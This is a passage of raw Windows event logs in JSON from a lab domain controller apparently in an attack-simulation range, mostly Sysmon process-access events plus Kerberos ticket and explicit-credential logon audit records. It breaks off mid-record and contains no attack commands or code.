C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5869,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5870,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5871,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5872,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5873,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-001071840800}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001071840800}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5874,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.385\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.385","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220629,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220630,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220631,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS 